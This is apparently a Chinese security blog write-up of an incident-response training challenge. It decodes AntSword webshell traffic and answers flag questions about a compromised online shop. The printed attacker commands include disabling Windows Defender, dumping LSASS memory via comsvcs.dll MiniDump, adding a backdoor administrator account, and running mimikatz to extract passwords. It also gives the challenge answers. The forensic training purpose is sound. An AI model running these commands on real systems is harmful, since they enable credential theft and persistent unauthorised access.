点击上方蓝字·关注我们
01
应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题
1.管理员Admin账号的密码是什么?
导出HTTP数据流发现product2.php是黑客上传的文件,因为他下面是Base64加密
继续分析Base64特征,可以判断为蚁剑流量特征
这里ctrl+F搜product2.php查看第一个包,依次对数据包进行全部解密.
C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sqlcd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami /priv&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&systeminfo&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net localgroup administrators&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net view&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net share&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:TempOnlineShopBackup.zip full&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&ls&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”© store.php c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:tempOnlineShopBackup.zip full&echo [S]&cd&echo [E]C:/Temp/OnlineShopBack.zipcd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:windowssystem32&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:windowsconfig&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami /all&echo [S]&cd&echo [E]#第二题编码列出来好找:##ilY2QgL2QgIkM6XFxwaHBTdHVkeVxcUEhQVHV0b3JpYWxcXFdXV1xcb25saW5lc2hvcCImbmV0IHVzZXIgYWRtaW4gUGFzc3dvcmQxIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0="
FLAG:Password1
02
2.LSASS.exe的程序进程ID是多少?
FLAG:852
03
3.用户WIN101的密码是什么?
导出http流找到47MB的导出分组字节流product2.php因为是蚁剑流量所以会有多余字节,删除即可.多余字节 e1c1709 加载mimiktz
sekurlsa::minidump 1.dmpsekurlsa::logonpasswords
FLAG:admin#123
总结:
这个也是蚁剑的流量,老样子Base64解密,rundll32.exe可用于执行DLL文件,也能调用该文件中的内部函数,这里就调用comsvcs.dll中的MiniDump函数会生成一个lsass.dmp文件 存储了系统账号密码mimiktz 执行读取命令即可.
PS:这里版本不一样解密不出来
关注我们
原文始发于微信公众号(鱼影安全):【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论